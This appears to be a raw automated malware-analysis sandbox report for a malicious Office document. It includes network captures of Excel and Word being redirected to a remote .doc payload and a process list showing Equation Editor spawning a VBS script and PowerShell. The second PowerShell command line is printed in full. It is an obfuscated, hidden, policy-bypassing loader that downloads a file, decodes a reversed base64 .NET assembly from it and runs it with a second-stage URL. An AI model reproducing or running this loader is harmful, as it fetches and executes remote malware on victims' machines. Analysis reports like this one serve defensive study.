Nov 27, 2024 17:56:25.440069914 CET | 1236 | IN | Data Raw: 00 7a 00 61 00 41 00 6c 00 71 00 6b 00 4a 00 69 00 6a 00 50 00 22 00 0d 00 0a 00 5a 00 63 00 6b 00 4b 00 49 00 63 00 6b 00 70 00 64 00 72 00 4b 00 6e 00 4b 00 42 00 4e 00 20 00 3d 00 20 00 22 00 66 00 4e 00 52 00 52 00 63 00 7a 00 6d 00 55 00 4e
    Data Ascii: zaAlqkJijP"ZckKIckpdrKnKBN = "fNRRczmUNpZzphN"uWKWhCLZTtWGBoe = "CnJLoWkdPLIWzPe"kiKriWKLlWeZfCl = "tLTAkLGPLPGRBdK
Nov 27, 2024 17:56:25.440085888 CET | 1236 | IN | Data Raw: 00 4b 00 4c 00 47 00 48 00 63 00 62 00 75 00 43 00 70 00 50 00 6a 00 20 00 3d 00 20 00 22 00 4c 00 65 00 5a 00 65 00 69 00 4e 00 43 00 62 00 64 00 63 00 4c 00 6d 00 70 00 63 00 4c 00 22 00 0d 00 0a 00 4b 00 4c 00 42 00 64 00 5a 00 41 00 4a 00 4f
    Data Ascii: KLGHcbuCpPj = "LeZeiNCbdcLmpcL"KLBdZAJOKWebecU = "JQJfKhAkldRPmLb"aRIWUNHApbLcfLC = "PtOmWSLgfZLiWWW"PdKuhBrUfsoO
Nov 27, 2024 17:56:25.440099001 CET | 1236 | IN | Data Raw: 00 4b 00 52 00 57 00 20 00 3d 00 20 00 22 00 73 00 4a 00 5a 00 4f 00 67 00 4c 00 65 00 62 00 65 00 4c 00 4c 00 70 00 57 00 68 00 6e 00 22 00 0d 00 0a 00 65 00 66 00 47 00 6b 00 4c 00 57 00 65 00 43 00 62 00 41 00 6b 00 55 00 6d 00 4e 00 55 00 20
    Data Ascii: KRW = "sJZOgLebeLLpWhn"efGkLWeCbAkUmNU = "GcAmUKKWbktPLKb"LniLAWhAUGWqmcd = "LtKmccbWzPKCLcJ"utckLfBTRWZkGao = "Kpi
Nov 27, 2024 17:56:25.440109968 CET | 1236 | IN | Data Raw: 00 47 00 42 00 5a 00 57 00 72 00 68 00 78 00 22 00 0d 00 0a 00 62 00 4c 00 6c 00 74 00 55 00 63 00 6f 00 62 00 66 00 57 00 63 00 68 00 63 00 42 00 71 00 20 00 3d 00 20 00 22 00 57 00 50 00 63 00 66 00 63 00 55 00 69 00 71 00 69 00 70 00 78 00 68
    Data Ascii: GBZWrhx"bLltUcobfWchcBq = "WPcfcUiqipxhcin"WLUUiLfrcWbcZfA = "fhdUKPNZceNWZfs"RLWGzLKxikkhihd = "WztbGPOAcjirinP"
Nov 27, 2024 17:56:25.440485954 CET | 1236 | IN | Data Raw: 00 50 00 20 00 3d 00 20 00 22 00 6e 00 50 00 4f 00 4b 00 6c 00 66 00 72 00 75 00 51 00 78 00 69 00 68 00 5a 00 69 00 71 00 22 00 0d 00 0a 00 4e 00 55 00 41 00 4c 00 6d 00 75 00 69 00 48 00 57 00 57 00 48 00 57 00 70 00 6b 00 49 00 20 00 3d 00 20
    Data Ascii: P = "nPOKlfruQxihZiq"NUALmuiHWWHWpkI = "OLtBimLoNKihGGK"JlJOnZphKLWKnAc = "uBcsAfcoClzWcCb"aOLTLHtbvTpfPLW = "LxN
Nov 27, 2024 17:56:25.440505028 CET | 1236 | IN | Data Raw: 00 0a 00 6d 00 4c 00 57 00 47 00 5a 00 43 00 6f 00 6d 00 55 00 6d 00 48 00 4b 00 47 00 57 00 6b 00 20 00 3d 00 20 00 22 00 67 00 57 00 41 00 70 00 65 00 65 00 4a 00 69 00 47 00 4b 00 57 00 53 00 41 00 71 00 47 00 22 00 0d 00 0a 00 57 00 50 00 4f
    Data Ascii: mLWGZComUmHKGWk = "gWApeeJiGKWSAqG"WPOiAtiWppWkWRn = "cRLUNSKpassanitodCjPWf"dKmGCKUfdTdTdtL = "NPohLUtNkWLKzdW"Op
Nov 27, 2024 17:56:25.440515995 CET | 1236 | IN | Data Raw: 00 6f 00 65 00 66 00 4c 00 6f 00 4e 00 6b 00 55 00 20 00 3d 00 20 00 22 00 47 00 70 00 70 00 78 00 50 00 6a 00 7a 00 50 00 6f 00 4b 00 4f 00 5a 00 69 00 66 00 4c 00 22 00 0d 00 0a 00 5a 00 57 00 68 00 6b 00 4b 00 49 00 64 00 6f 00 74 00 4b 00 74
    Data Ascii: oefLoNkU = "GppxPjzPoKOZifL"ZWhkKIdotKtlaTL = "mQWULGdLdWkNWTB"jNeGCWmuikmWNWz = "phAxieGRsKUOWPi"WKznLmOLthWnLuZ =
Nov 27, 2024 17:56:25.560549021 CET | 1236 | IN | Data Raw: 00 6b 00 6b 00 76 00 66 00 69 00 57 00 61 00 57 00 4b 00 55 00 22 00 0d 00 0a 00 52 00 68 00 55 00 42 00 57 00 4c 00 69 00 4f 00 6a 00 67 00 78 00 4b 00 74 00 6b 00 48 00 20 00 3d 00 20 00 22 00 72 00 51 00 4b 00 62 00 6b 00 4c 00 6f 00 41 00 4c
    Data Ascii: kkvfiWaWKU"RhUBWLiOjgxKtkH = "rQKbkLoALcAiiud"ogiRLLpCnLlqgKW = "sjsKCGWdGjoziOW"bhzikiLbkZLiCrg = "WiecvcGAPkLLLdK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49165 | 152.231.102.107 | 443 | 3208 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-11-27 16:55:59 UTC | 404 | OUT | GET /mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange&slice HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: ljg.cl
    Connection: Keep-Alive
2024-11-27 16:55:59 UTC | 695 | IN | HTTP/1.1 302 Found
    Server: openresty
    Date: Wed, 27 Nov 2024 16:55:59 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 235
    Connection: close
    X-DNS-Prefetch-Control: off
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=15552000; includeSubDomains
    X-Download-Options: noopen
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Location: http://23.95.128.215/43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc
    Vary: Accept
    Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
    X-Served-By: ljg.cl
2024-11-27 16:55:59 UTC | 235 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 31 32 38 2e 32 31 35 2f 34 33 2f 68 75 2f 73 65 65 6d 79 62 65 73 74 6d 61 67 69 63 61 6c 74 68 69 6e 67 73 65 6e 69 74 65 72 77 6f 72 6c 64 77 68 63 69 68 67 69 76 65 6e 62 65 73 74 68 69 6e 67 73 65 6e 74 65 72 69 65 74 69 6d 65 67 69 76 65 6e 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 67 69 76 65 6d 62 65 73 74 74 68 69 6e 67 73 77 68 69 63 68 69 72 65 61 6c 6c 79 66 65 6c 6c 74 6f 64 6f 62 65 73 74 74 68 69 6e 67 73 77 68 69 63 68 69 72 65 61 6c 6c 79 6e 65 64 64 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 62 65 73 74 6f 66 6c 75 63 6b 74 68 69 67 6e 73 61 72 65 67 6f 6f 64 6e 61 64 73 61 67 65 2e 64 6f 63
    Data Ascii: Found. Redirecting to http://23.95.128.215/43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      1 | 192.168.2.22 | 49167 | 152.231.102.107 | 443 | 3472 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-11-27 16:56:04 UTC | 128 | OUT | OPTIONS / HTTP/1.1
                                                                      User-Agent: Microsoft Office Protocol Discovery
                                                                      Host: ljg.cl
                                                                      Content-Length: 0
                                                                      Connection: Keep-Alive
                                                                      2024-11-27 16:56:04 UTC | 520 | IN | HTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Wed, 27 Nov 2024 16:56:04 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 8
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Allow: GET,HEAD
                                                                      ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      X-Served-By: ljg.cl
                                                                      2024-11-27 16:56:04 UTC | 8 | IN | Data Raw: 47 45 54 2c 48 45 41 44
                                                                      Data Ascii: GET,HEAD


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      2 | 192.168.2.22 | 49168 | 152.231.102.107 | 443 | 3472 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-11-27 16:56:06 UTC | 198 | OUT | HEAD /mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange&slice HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                      Host: ljg.cl
                                                                      2024-11-27 16:56:07 UTC | 707 | IN | HTTP/1.1 302 Found
                                                                      Server: openresty
                                                                      Date: Wed, 27 Nov 2024 16:56:07 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 235
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Location: http://23.95.128.215/43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc
                                                                      Vary: Accept
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      X-Served-By: ljg.cl


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                      3 | 192.168.2.22 | 49169 | 152.231.102.107 | 443
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-11-27 16:56:12 UTC | 123 | OUT | OPTIONS / HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                      translate: f
                                                                      Host: ljg.cl
                                                                      2024-11-27 16:56:13 UTC | 520 | IN | HTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Wed, 27 Nov 2024 16:56:13 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 8
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Allow: GET,HEAD
                                                                      ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      X-Served-By: ljg.cl
                                                                      2024-11-27 16:56:13 UTC | 8 | IN | Data Raw: 47 45 54 2c 48 45 41 44
                                                                      Data Ascii: GET,HEAD


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                      4 | 192.168.2.22 | 49170 | 152.231.102.107 | 443
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-11-27 16:56:15 UTC | 153 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6c 6a 67 2e 63 6c 0d 0a 0d 0a
                                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: ljg.cl
                                                                      2024-11-27 16:56:16 UTC | 495 | IN | HTTP/1.1 404 Not Found
                                                                      Server: openresty
                                                                      Date: Wed, 27 Nov 2024 16:56:16 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 144
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Content-Security-Policy: default-src 'none'
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      2024-11-27 16:56:16 UTC | 144 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                      5 | 192.168.2.22 | 49171 | 152.231.102.107 | 443
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-11-27 16:56:18 UTC | 153 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6c 6a 67 2e 63 6c 0d 0a 0d 0a
                                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: ljg.cl
                                                                      2024-11-27 16:56:18 UTC | 495 | IN | HTTP/1.1 404 Not Found
                                                                      Server: openresty
                                                                      Date: Wed, 27 Nov 2024 16:56:18 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 144
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Content-Security-Policy: default-src 'none'
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      2024-11-27 16:56:18 UTC | 144 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      6 | 192.168.2.22 | 49172 | 152.231.102.107 | 443 | 3472 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-11-27 16:56:20 UTC | 217 | OUT | HEAD /mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange&slice HTTP/1.1
                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                      Host: ljg.cl
                                                                      Content-Length: 0
                                                                      Connection: Keep-Alive
                                                                      2024-11-27 16:56:21 UTC | 707 | IN | HTTP/1.1 302 Found
                                                                      Server: openresty
                                                                      Date: Wed, 27 Nov 2024 16:56:20 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 235
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Location: http://23.95.128.215/43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc
                                                                      Vary: Accept
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      X-Served-By: ljg.cl


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      7 | 192.168.2.22 | 49175 | 193.30.119.205 | 443 | 4024 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-11-27 16:56:32 UTC | 211 | OUT | GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
                                                                      Host: 3105.filemail.com
                                                                      Connection: Keep-Alive
                                                                      2024-11-27 16:56:32 UTC | 234 | IN | HTTP/1.1 500 Internal Server Error
                                                                      Cache-Control: no-cache,no-store
                                                                      Pragma: no-cache
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: application/json; charset=utf-8
                                                                      Expires: -1
                                                                      Date: Wed, 27 Nov 2024 16:56:30 GMT
                                                                      Connection: close
                                                                      2024-11-27 16:56:32 UTC | 307 | IN | Data Raw: 31 32 63 0d 0a 7b 22 76 61 6c 69 64 61 74 69 6f 6e 65 72 72 6f 72 73 22 3a 5b 7b 22 50 72 6f 70 65 72 74 79 4e 61 6d 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 22 2c 22 45 72 72 6f 72 43 6f 64 65 22 3a 22 54 72 61 6e 73 66 65 72 45 78 70 69 72 65 64 22 2c 22 45 72 72 6f 72 4d 65 73 73 61 67 65 22 3a 22 54 68 69 73 20 74 72 61 6e 73 66 65 72 20 69 73 20 65 78 70 69 72 65 64 22 7d 5d 2c 22 72 65 73 70 6f 6e 73 65 73 74 61 74 75 73 22 3a 22 54 72 61 6e 73 66 65 72 45 78 70 69 72 65 64 22 2c 22 65 72 72 6f 72 69 64 22 3a 22 34 32 32 62 63 33 62 37 2d 62 36 34 30 2d 34 39 35 35 2d 38 32 61 35 2d 36 65 65 61 62 34 39 65 30 39 61 30 22 2c 22 65 72 72 6f 72 6d 65 73 73 61 67 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 20 2d 2d 3e 20 5b 54 72 61 6e 73 66 65 72 45 78
                                                                      Data Ascii: 12c{"validationerrors":[{"PropertyName":"transferid","ErrorCode":"TransferExpired","ErrorMessage":"This transfer is expired"}],"responsestatus":"TransferExpired","errorid":"422bc3b7-b640-4955-82a5-6eeab49e09a0","errormessage":"transferid --> [TransferEx
                                                                      2024-11-27 16:56:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Target ID: 0
                                                                      Start time: 11:55:36
                                                                      Start date: 27/11/2024
                                                                      Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      Wow64 process (32bit): false
                                                                      Commandline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                      Imagebase: 0x13fdb0000
                                                                      File size: 28'253'536 bytes
                                                                      MD5 hash: D53B85E21886D2AF9815C377537BCAC3
                                                                      Has elevated privileges: true
                                                                      Has administrator privileges: true
                                                                      Programmed in: C, C++ or other language
                                                                      Reputation: high
                                                                      Has exited: false

                                                                      Target ID: 3
                                                                      Start time: 11:56:00
                                                                      Start date: 27/11/2024
                                                                      Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      Wow64 process (32bit): false
                                                                      Commandline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                                      Imagebase: 0x13f150000
                                                                      File size: 1'423'704 bytes
                                                                      MD5 hash: 9EE74859D22DAE61F1750B3A1BACB6F5
                                                                      Has elevated privileges: true
                                                                      Has administrator privileges: true
                                                                      Programmed in: C, C++ or other language
                                                                      Reputation: high
                                                                      Has exited: false

                                                                      Target ID: 9
                                                                      Start time: 11:56:21
                                                                      Start date: 27/11/2024
                                                                      Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      Wow64 process (32bit): true
                                                                      Commandline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                      Imagebase: 0x400000
                                                                      File size: 543'304 bytes
                                                                      MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
                                                                      Has elevated privileges: true
                                                                      Has administrator privileges: true
                                                                      Programmed in: C, C++ or other language
                                                                      Reputation: high
                                                                      Has exited: true

                                                                      Target ID: 10
                                                                      Start time: 11:56:25
                                                                      Start date: 27/11/2024
                                                                      Path: C:\Windows\SysWOW64\wscript.exe
                                                                      Wow64 process (32bit): true
                                                                      Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs"
                                                                      Imagebase: 0x930000
                                                                      File size: 141'824 bytes
                                                                      MD5 hash: 979D74799EA6C8B8167869A68DF5204A
                                                                      Has elevated privileges: true
                                                                      Has administrator privileges: true
                                                                      Programmed in: C, C++ or other language
                                                                      Reputation: high
                                                                      Has exited: true

                                                                      Target ID: 11
                                                                      Start time: 11:56:25
                                                                      Start date: 27/11/2024
                                                                      Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit): true
                                                                      Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                      Imagebase: 0x1170000
                                                                      File size: 427'008 bytes
                                                                      MD5 hash: EB32C070E658937AA9FA9F3AE629B2B8
                                                                      Has elevated privileges: true
                                                                      Has administrator privileges: true
                                                                      Programmed in: C, C++ or other language
                                                                      Reputation: high
                                                                      Has exited: true

                                                                      Target ID: 13
                                                                      Start time: 11:56:26
                                                                      Start date: 27/11/2024
                                                                      Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit): true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"
                                                                      Imagebase: 0x1170000
                                                                      File size: 427'008 bytes
                                                                      MD5 hash: EB32C070E658937AA9FA9F3AE629B2B8
                                                                      Has elevated privileges: true
                                                                      Has administrator privileges: true
                                                                      Programmed in: C, C++ or other language
                                                                      Reputation: high
                                                                      Has exited: true

                                                                      Call Graph


                                                                      Module: Sheet1

                                                                      Declaration
                                                                      Attribute VB_Name = "Sheet1"
                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
                                                                      Attribute VB_Customizable = True

                                                                      Module: Sheet2

                                                                      Declaration
                                                                      Attribute VB_Name = "Sheet2"
                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
                                                                      Attribute VB_Customizable = True

                                                                      Module: Sheet3

                                                                      Declaration
                                                                      Attribute VB_Name = "Sheet3"
                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
                                                                      Attribute VB_Customizable = True

                                                                      Module: ThisWorkbook

                                                                      Declaration
                                                                      Attribute VB_Name = "ThisWorkbook"
                                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
